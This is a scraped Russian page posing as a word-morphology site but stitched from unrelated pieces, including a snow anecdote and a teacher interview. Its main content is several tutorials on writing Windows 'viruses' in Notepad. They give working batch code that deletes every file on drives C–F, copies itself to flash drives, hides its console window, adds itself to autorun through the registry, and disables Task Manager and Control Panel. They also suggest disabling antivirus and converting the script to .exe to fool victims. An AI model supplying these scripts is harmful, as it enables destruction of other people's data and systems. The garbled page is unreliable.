Главная » Правописание слов » Как написать вирусы в блокноте

Слово Как написать вирусы в блокноте - однокоренные слова и морфемный разбор слова (приставка, корень, суффикс, окончание):


Морфемный разбор слова:

Однокоренные слова к слову:

Создаем вирус в блокноте

NGaming

.pisya

Удаляет все с доп. носителей

Удаляет все что хранится в реестре

Останавливает доступ в Интернет пользователя. Чтобы получить доступ обратно напишите IPconfig /renew в CMD

Отправляет сообщение и выключает компьютер

Простой вирус, который заставляет компьютер дать ошибку.
Сохранить как файл.VBS

Форматируются диски менее чем за 5 секунд. Только D, Е и С

Останавливает компьютер каждый раз при его включении

А теперь более опасные батники:

Заставляет систему упасть один раз потом компьютер не может быть перезапущен. Он удаляет все необходимое для запуска системы
НЕ ИСПОЛЬЗУЙТЕ НА СЕБЕ

Этот вирус отключает Интернет навсегда

NGaming

.pisya

prorok

Have a nice day

Justman

Даэдрот такой

NGaming

.pisya

grinex

aka Logequm

Удаляет все с доп. носителей

Удаляет все что хранится в реестре

Останавливает доступ в Интернет пользователя. Чтобы получить доступ обратно напишите IPconfig /renew в CMD

Отправляет сообщение и выключает компьютер

Простой вирус, который заставляет компьютер дать ошибку.
Сохранить как файл.VBS

Форматируются диски менее чем за 5 секунд. Только D, Е и С

Останавливает компьютер каждый раз при его включении

А теперь более опасные батники:

Заставляет систему упасть один раз потом компьютер не может быть перезапущен. Он удаляет все необходимое для запуска системы
НЕ ИСПОЛЬЗУЙТЕ НА СЕБЕ

Этот вирус отключает Интернет навсегда

Источник

Создаем вирус-шутку через блокнот.

Ближе к делу: я буду рассказывать что эта шутка вообще делает, буду вставлять скрины и все объяснять. Напомню, это ознакомительный пост! В других постах я буду конкретно писать, как создать такой-то вирус.

Вирус-шутка это программа, которую создают в блокноте. Т.е. пишешь там команды и сохраняешь их определенных форматах. Если все правильно сделано, без ошибок, то вирус-шутка сработает. Кстати, «вирус-шутка» это условное название. В блокноте можно создать и игру, и крестики нолики, часы.

ПРЕДУПРЕЖДЕНИЕ. Перед созданием вируса отключите Анти-Вирус.

1) Создание вируса: Для начала откройте блокнот.

2) В блокноте начинайте писать команду. Для начала скопируйте этот текст туда:

msgbox»Ты не против, если я буду жить у тебя в компе?»,32+4,»Вопрос»

msgbox»Ок, ты не против»,64,»Я понял»

msgbox»Ок, ты не против»,64,»Я понял»

msgbox»Это шутка, это НЕ вирус 🙂 ХАХАХАХА»,64,»Я пошутил»

msgbox»Или же нет. «,64,». «

Я НЕ ЖЕЛАЮ ВАМ ЗЛА! ЭТОТ ВИРУС НЕ МОЖЕТ ПРИНЕСТИ ВАМ И ВАШЕМУ КОМПУ ВРЕДА!

4) Теперь у вас на Рабочем столе должен появиться вот такой значок:

6) У вас должен открыться вирус-шутка. Если же не работает, то два варианта: либо у вас включен Анти-Вирус, либо ваш комп не поддерживает это.

7) НЕ ПУГАЙТЕСЬ! ВИРУС-ШУТКА НЕ ПРИНЕСЕТ ВРЕДА. Теперь вам осталось читать то, что там написано, и кликать по кнопкам (любым).

Вы можете изменить в команде вируса текст. Например вместо «Windows удалить?» можно написать «ставьте лайки!». Удачи вам, экспериментируйте со своими вирусами!

И так, как я обещал, это был ознакомительный пост. Вскоре я выложу пост, где подробно опишу все значения, как все делать и т.д. Отпишитесь в тапках как вам мой пост, киньте скрины своего вируса. Мне будет интересно 😀

сука! у меня винда удалилась!

ТС, у вас тоже снегопад? Занятия в школах отменили?

Мне хочется узнать все подробно как это работает что обозначает msgbox, цифры 64; 32+4

VBA макрос еще бы присобачил в виде екселя, что бы кошмарил тупыми вопросами!

также можно сделать чтобы он не закрывался

а если уже не шутка то можно оффнуть диспетчер задач команда

REG ADD «HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System» /f /v «DisableTaskMgr» /t REG_DWORD /d 0

Я такие шутки на Юкозах лет 8-10 назад видел.
PS: про дисковод уж тогда бы запилил.

Друзья, напишите то, как я объяснял. Понятно или нет.

Школьник добрался до учебников? Похвально, но баян.

Ответ на пост «Взрослые снежки»

Было лет 5 назад. Привёл сына в садик, а там воспитательница просит меня прочистить их площадку, которую за ночь засыпало снегом мне по пояс точно, а рост у меня 195см. Беру лопату выхожу на площадку и понимаю, что я охренею копать тут, но тут мне пришла гениальная мысль как и себе работу уменьшить и детей порадовать. Стал копать проходы в виде лабиринта. Где-то за час справился и сбежал пока не заставили переделывать. А вечером воспиталка чуть ли не на руках носила)) говорит дети когда вышли гулять сначала замерли, а потом с визгом давай там носиться еле на обед загнала и гулять они стали ходить гораздо охотнее до весны))) а потом как-то меня спросили какие им мультики можно показать в группе вечером, а то у них скудный выбор, ну я и принес все сезоны букашек и барашка Шона. Дети отказывались в слезах домой уходить. В общем авторитет у меня был огромный тогда, правда среди пиздюков, но все же.

Никто да?!

Двойные стандарты

Прошло три года и многое изменилось

Есть идея

Обман, кругом обман

Делай добро.

Учитель литературы, с которым не стали продлевать контракт из-за блога на YouTube

Андрей Федоров, учитель русского языка и литературы из Геленджика, который ведет блог «Борода Достоевского», рассказал «Мелу» о том, как поменять отношение учеников к предмету и чем в этом могут помочь новые форматы.

Вряд ли в наше время стоит разделять педагогов на «учитель-мужчина» и «учитель-женщина». Да, сейчас мужчин в школах мало, преподавателей литературы еще меньше — у нас в городе их трое, включая меня. Но это не мешает преподавать. Важно другое: интересный ли ты человек, нравится ли тебе то, что ты делаешь. А уж мужчина ты или женщина — десятый вопрос.

Я не задумывался о гендерном вопросе, когда шел учиться на педагога русского и литературы. Вся моя семья любила книги, в доме у нас их было множество. Ребенком я читал по ночам, с фонариком. Уже школьником понимал, что вообще-то ребята вокруг меня мало читают, не очень любят обсуждать книги. В 11 классе я решал, куда буду поступать, и понял, что если я стану педагогом — то смогу влиять на жизнь детей, делать для них что-то хорошее.

Чем дольше живу, тем больше у меня вопросов и меньше ответов. Звучит иронично, но я правда каждый год, в зависимости от детей, ставлю новые цели. Вообще, литература помогает включить голову, сделать кругозор немножечко, а желательно и «множечко» шире. Когда ты вникаешь в нее, понимаешь ее, к изучению подходишь с чистым желанием, то открываются такие просторы, что там можно рассказать не только о моральных ценностях, но вообще сформировать человека. Мы ведь состоим из того, что едим, а литература в каком-то смысле и есть «духовная пища».

Классические истины до детей можно донести современным, понятным ребенку языком — это я и пытаюсь делать. Если общаться с детьми через произведения вроде «Евгения Онегина» или «Слова о полку Игореве», не адаптируя их под современного школьника, донести свою мысль будет сложно. Ученик в итоге скажет: «Ага, классно», а потом закроет книгу и все забудет. Поэтому я стараюсь давать и более современные произведения.

Например, я несколько раз давал детям «Маленького принца» Антуана Сент-Экзюпери. По программе его читают только в 6 классе, когда ребятам 11-12 лет. Но это одно из тех произведений, которое по-разному открывается взрослеющему человеку.

Поэтому и в школе я давал это произведение и 6-м, и 7-м, и 8-м классам. Было интересно смотреть, как на один и тот же сюжет смотрят дети разного возраста. Из-за этого в школе у меня бывали проблемы.

Потом мне говорили: «Вы вставляете в программу не всё, что нужно». Но если ребенок не прочитает какую-то книгу или стихотворение из программы, с ним глобально не случится ничего страшного. Однако если я смогу показать ему текст, который повлияет на его мировоззрение — это здорово. Значит, наверное, не зря я на своем месте. Но иногда это не принимают.

То, что книга есть в программе, не гарантирует, что подростки ее поймут и обязательно ей заинтересуются. Говоря о сложных текстах, например, о «Преступлении и наказании», мы с подростками беремся не за весь материал сразу, а готовимся к нему. До того, как начать чтение этого романа, мы смотрели лекции Дмитрия Быкова, читали «Игрока», который гораздо легче. После него школьники лучше воспринимают Достоевского. Это вроде бы мелочь, но детям жизнь упрощает.

Я не люблю сравнивать молодых преподавателей и опытных. Учителя, которые сами не так давно были школьниками, возможно, больше понимают современные сложности, знают, о каких блогерах говорят подростки на переменах. Мы можем общаться на равных, но речь, конечно, не идет о панибратстве.

Иногда дети говорят, что со мной им классно. На вопрос «почему» отвечают: «Вы с нами разговариваете». Ребятам элементарно не хватает того, чтобы с ними поговорили и выслушали. Часто бывает, что они спрашивают, советуются даже насчет отношений с родителями, сверстниками. Видимо, доверяют мне, потому что я помоложе других учителей. Они видят во мне человека, который не побежит рассказывать о личных, сокровенных тревогах детей их родителям.

Хотя сначала все было не совсем гладко. Один парень на первом уроке засунул bluetooth-колонку в шкаф, включил музыку. Я намерение разгадал, поговорил с мальчиком, разобрался. Но я не кричал на детей, не психовал — может, такой реакции они и ждали, — а просто показал глупость происходящего. Ситуация даже пошла на пользу.

Нет палочки-выручалочки, которая в один миг поможет ребенку полюбить чтение. Каждый случай надо рассматривать отдельно. Прежде всего учитель должен показать собственную страсть к тому, о чем он говорит, убедить ребенка в том, что он сам верит в крутость литературы. Ребенку не понравится то, от чего педагог сам не кайфует. Особенно это важно, если в школу приходит новый учитель или педагог все время работает с новыми детьми.

Нужно найти такой путь к тексту, который будет понятен ребенку. Однажды я проводил урок о средствах выразительности, на котором мы с ребятами взяли песни из чарта «ВК» и разбирали их на наличие метафор, эпитетов.На том занятии троечники, которые обычно сидят в абсолютном безразличии, были очень увлечены процессом

К тому же этот урок помог разобраться не только в механизмах текста, но и смыслах: сейчас нельзя просто сказать, что такая-то песня плохая, слушать ее нельзя. На уроке, разбирая текст, дети сами приходили к выводам насчет не самых качественных композиций.

Именно это важно мне в преподавании. Если из всех моих учеников хотя бы одна десятая их часть начнет больше читать, серьезнее относиться к своей жизни, это уже будет не зря. Я не смогу за короткий срок сделать из двоечника отличника, но хотя бы попытаюсь вложить в его голову то, что литература может быть интересной.

Однажды я занимался с мальчиком в индивидуальном порядке для подготовки к ОГЭ. Мы начали занятия в сентябре, он плохо шел на контакт, из него трудно было вытягивать слова: я что-то спрашивал, а он отвечал односложно, едва-едва. Сочинения у него получались очень примитивными. Я пытался придумать, как могу увлечь его, и тогда решил предложить ему писать сочинения не на темы из кодификатора, а о том, что интересно ему самому — «На кого из супергероев я хочу быть похож?», «Какой суперспособностью я мечтаю обладать?», «Куда бы я отправился на машине времени?». Он же заинтересовался сочинением-рассуждением по теме компьютерных игр.

В итоге он расписал мне, почему Minecraft — хорошая игра. К маю он писал сочинения на полторы страницы, а начинали мы с трети. Для меня такой результат был огромной радостью, потому что я не просто видел результат своего труда, но понимал, что он достигнут не силой, не навязыванием чуждых тем вроде абстрактного «Утро в зимнем лесу». Детям плевать на это утро в зимнем лесу. Важнее понять проблему ребенка и работать с ней.

Блог на YouTube я больше двух лет назад создал вместе со своим другом: сначала мы снимали видео о кино. Друг уехал, у меня в жизни наступил сложный период, с роликами я ненадолго завязал. В феврале этого года я вернулся на канал уже как учитель, эксперт, который хочет развивать свою сферу.

Я поговорил с детьми, попытался узнать, что им интересно: «Ребят, у вас репетиторов куча, но вам показывали когда-нибудь, как правильно учить стихи, как легче их запоминать?». Оказалось, что никому не рассказывали каких-то особых и действенных способов. Советовали книги под подушку класть, но это ведь не совет, а примета. И тогда я снял ролик о семи способах легко выучить стихотворение.

Дальше был ролик про сочинение на «пять». Потому что этот вопрос для детей тоже проблемный. Я размышляю так: если у детей есть трудности, надо помочь их решить. У меня может быть ответ, какая-то полезная информация — я ей делюсь. Здорово потом видеть результат, читать комментарии.

У меня есть две цели. Первая — популяризовать литературу, ее изучение. Это для детей. Прямо сейчас я готовлю новый проект для своего канала, и если он окажется успешным — то станет серьезным шагом на пути к моей цели. Хотя я понимаю, что не все ребята, как бы учитель ни старался, смогут полюбить русский язык и литературу. Раньше думал: «Почему вот эти ходят с таким упоением, а некоторые товарищи засыпают?». Но сейчас это повод не для грусти, а для того, чтобы больше стараться. Ради этой цели я кроме YouTube-канала веду тикток.

Другая цель скорее про взрослых. Я хочу показать, что не все учителя готовы поступиться с принципами, заняться, к примеру, вбросами и отказаться от критики. Под некоторыми видео люди писали: «А вас там заставляют голосовать?». Мне грустно, что учителей воспринимают как людей с промытыми мозгами.

Классных, думающих педагогов очень много, и мне важно показать, что они есть, просто в большинстве случаев остаются в тени

Ученики к моему увлечению относились отлично, просили фотографии: «Андрей Григорьевич, давайте сфоткаемся! Потом станете известным, а у нас будет фото». Отвечал им, что их бы слова да Богу в уши: чем больше людей будет смотреть мои видео, тем лучше. Мне ведь кажется, что я стараюсь делать что-то адекватное, хочу быть полезным. И надеюсь, что делаю это не впустую.

Когда я снял первое видео про стихотворения, администрация моей школы сказала: «У вас есть время урока, вот там об этом всем и говорите». Но почему я не могу дать эту информацию детям, если она будет им полезна? Для меня такая претензия удивительна: я ведь не нажиться хочу, не популярность у детей получить, а сделать что-то хорошее. Когда же сами дети на уроке хотели перевести тему на блог, узнать, когда новое видео, я останавливал их: «Стоп! Все темы вне урока мы обсуждаем на перемене».

Негатива было не очень много, но он был ярким и насыщенным. Некоторые коллеги, наоборот, говорили, что я здорово снимаю, а кто-то мне сказал так: «Видел ваш ролик, ничего нового вы там не рассказали. Я такой же могу снять». Я подумал: «Снимайте сами, так ведь только лучше». Мне стоило немалых усилий объяснить, что нажиться на YouTube или TikTok я тоже не могу, потому что денег эти платформы мне не платят.

Началось лето, казалось, все затихло. Я работал в школе при санатории, где учил детей как педагог в течение года, а затем выходил на работу в июле как воспитатель, но по сути тоже вел уроки. Мне должны были переподписать контракт в августе, но этого не произошло. Работы я лишился, но желаю коллегам добра и всего самого хорошего. Может быть, однажды они смогут принять мою позицию.

Я не хочу уделять своему блогу все время, он — не мое главное дело. Куда важнее для меня работать с детьми, и поэтому прямо сейчас я устраиваюсь в новую школу.

Источник

Как написать вирусы в блокноте? Пример простого вируса

Создаем простой (но довольно опасный вирус) с помощью простого блокнота Notepad

Многим приходила идея в голову «а как написать простой вирус в блокноте?».

Люди, особенно только начинающие познавать компьютер, думают, что о создании вирусов должны знать только хакеры, но в реальности об этом должен знать каждый пользователь компьютера. Такие знания помогут сохранить безопасность своего компьютера.

В путь

На первый взгляд код не выглядит страшно, просто несколько немного непонятных команд, в фильмах все иначе, да?

Однако, если расположить документ с вирусом в папку «system32\drivers\etc», заставить его запускаться автоматически и перезапустить компьютер, то случится нечто ужасное: у вас перестанет работать возможность запуска программ, да и вообще нельзя будет выполнить какое-либо действие.

ВНИМАНИЕ: НЕ СТОИТ ЭТОГО ДЕЛАТЬ, ЕСЛИ У ВАС НЕТ ОПЫТА РАБОТЫ С ФАЙЛАМИ В СИСТЕМНОМ РЕЕСТРЕ!

Если просто хотите почувствовать себя взломщиком мирового масштаба, то вместо telnetdrive.bat напишите безобидные процессы: запуск калькулятора, диспетчера задач или стандартной программы для рисования.

Немного опасных, но интересных знаний

Теперь пришла пора создания собственного вируса, для этого надо открыть блокнот, внести туда команды указанные ниже (создать главное «тело» вируса).

Сохранять надо, используя команды «Файл» и «Сохранить как».

Вот что еще можно создать ради «забав» с чьим-нибудь компьютером (ДЕЛАТЬ ЭТОГО НЕ РЕКОМЕНДУЕТСЯ):

Источник

Написание вирусов в блокноте

Недавно вспомнил об одной из своих ранних статей о сценариях Windows и, пожалуй выложу сегодня её в почти первозданном виде. Сейчас, конечно, предпочел бы для таких целей, как минимум VBS, но, может кому то будет интересно почитать и о простейших сценариях…

Для начала, я откажусь от всякой ответственности за представленный материал и заявлю, что все, что выбудете делать используя информацию, изложенную ниже вы делаете исключительно на свой страх и риск! И, на всякий случай, заявлю, что никаким написанием вирусов я не занимаюсь. Просто когда то было интересно, как это работает и я решил поделиться…

Вы наверняка слышали о сценариях Windows, файлах с расширением *.bat.
Если разобраться, то они являются текстовым файлом, содержащим определенные инструкции, которые будут выполнены после запуска. Итак для написания самых простых вирусов (или просто сценариев) нам понадобится блокнот, или другой текстовый редактор, а также немного энтузиазма.

Итак, как я уже говорил, сценарий имеет расширение *.bat и является текстовым файлом, значит:
1. Создаем текстовый документ с инструкциями: «Taskmgr»( без кавычек);
2. Сохраняем с любым именем и расширением *.bat;
3. Открываем файл и видим что открылся Диспетчер задач.
Вместо Taskmgr можно указать любую программу(например: mspaint – Paint, Calc – калькулятор). До вирусов еще далеко, но теперь вы знаете как работают сценарии.

md folder
copy%0 F:\program.bat

Запускаем и видим, что в папке, с которой была запущена наша программка, появилась еще одна папка с именем «folder», а на диске F: появился файл «program.bat» содержащий текст нашей программы.

Теперь я приведу перечень строк, которые могут присутствовать в наших программах(вирусах):

Используя полученные знания, мы можем написать такие вредоносные программки:

1. Меняет дату и время на компьютере и копирует себя на диск С и на флешку:

time 14:13
date 11.07.12
copy %0 C:\date.bat
copy %0 F:\date.bat

2. Или же удаляет все файлы с флешки, переименовывает её и копирует себя на неё:

del F:\ *.* /q
label F:error
copy %0 F:\deleter.bat

3. Удаляет все файлы с дисков (кроме тех, которые находятся в папках) и меняет дату и время:

del C:\ *.* /q
del D:\ *.* /q
del E:\ *.* /q
del F:\ *.* /q
time 00:00
date 13.06.23
del *.* /q

Сложно не заметить окно командной строки, которое открывается при запуске наших программ и тут же исчезает… Так вот чтобы его скрыться от жертвы добавляем вначале программы команду «@echo off» также после каждой команды нужно добавить действие, которое скроет строчку «>nul».
После такого усовершенствования наш вирус принимает вид:

@echo off
del C:\ *.* /q >nul
del D:\ *.* /q >nul
del E:\ *.* /q >nul
del F:\ *.* /q >nul
time 00:00 >nul
date 13.06.23 >nul
del *.* /q >nul

Вирус готов! Да вот только кто откроет какой то непонятный файл с непонятным расширением да еще и без иконки? Мало кто! Значит необходимо отконвертировать наш вирус в формат *.exe. для этого можно использовать WinRAR или же еще лучше такую программу как «Bat to exe converter».

В наших вирусах мы можем использовать еще такие скрипты:

1. Меняет клавиши мыши местами:

%SystemRoot%/system32/rundll32 user32, SwapMouseButton

2. Открывает выбранную программу до полного зависания компьютера:

? ;
Start mspaint
goto x ;

3. Добавляет наш вирус в автозапуск (!):

copy «»%0″» «%SystemRoot%\system32\File.bat»
reg add «HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run» /v «Filel» /t REG_SZ /d «%SystemRoot%\system32\File.bat» /f
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoControlPanel /t REG_DWORD /d 1 /f

Теперь имеем достаточно знаний для написания простеньких вирусов. Напоследок напомню, что писать вирусы это не очень хорошо и я надеюсь что читали вы эту статью исключительно из любопытства. Но, тем не менее удачи. ?

Источник

Теперь вы знаете какие однокоренные слова подходят к слову Как написать вирусы в блокноте, а так же какой у него корень, приставка, суффикс и окончание. Вы можете дополнить список однокоренных слов к слову "Как написать вирусы в блокноте", предложив свой вариант в комментариях ниже, а также выразить свое несогласие проведенным с морфемным разбором.

Какие вы еще знаете однокоренные слова к слову Как написать вирусы в блокноте:



Добавить комментарий

Ваш адрес email не будет опубликован. Обязательные поля помечены *